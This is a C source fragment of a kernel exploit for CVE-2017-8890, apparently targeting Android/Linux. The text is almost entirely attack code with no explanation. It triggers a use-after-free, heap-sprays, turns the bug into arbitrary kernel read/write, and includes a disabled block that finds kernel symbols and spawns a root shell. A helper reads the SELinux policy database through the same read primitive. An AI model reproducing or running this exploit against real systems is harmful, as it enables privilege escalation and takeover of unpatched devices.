int main(int argc, char *argv[]) { cpu_num = sysconf(_SC_NPROCESSORS_CONF); setbuf(stdout, NULL); printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num); printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid()); #if FORKCHILD int x; for ( x = 0; x < children_num ; x++ ) { if ( (child[x] = fork() ) == 0 ) { printf("I'm child : %d\n", x); while(time((time_t*)NULL)); } } #endif init_fake_obj(); cpuid = sched_getcpu(); if (prepare() < 0 ) err(-1,"prepare failed.."); if (trigger() < 0 ) err(-1, "trigger failed..."); keep_spraying(100); char tester[8] = {}; for (;;) { if (!read_at_address_pipe((void*)0xFFFFFFC000080000LL, &tester, 4)) { printf("Turn UAF to arbitrary read/write succeeded.\n"); break; } } #if 0 printf("[!] we're trying to find ksyms firstly.\n"); if ( 1 != break_kptr_restrict() ) err(-1, "ksym not found."); init_task = (size_t)get_kallsym_address("init_task", NULL); printf("init_task : %p\n", (void*)init_task); found_tsk_by_swapper(init_task); /* in post_exp.c */ system("/system/bin/sh"); while(1); #endif return 0; }
static inline struct flex_array* __kernel get_types_fa() { struct flex_array* __kernel fa = NULL; struct policydb* pdb = malloc(sizeof(*pdb)); if (!pdb) return NULL; if(!policydb) goto end; if(!read_at_address_pipe(policydb, pdb, sizeof(*pdb))) fa = pdb->sym_val_to_name[SYM_TYPES]; end: free(pdb); return fa; }